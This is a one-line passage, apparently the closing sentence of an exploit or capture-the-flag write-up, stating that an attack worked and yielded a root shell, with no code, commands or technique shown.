```
It works, and we get a root shell.
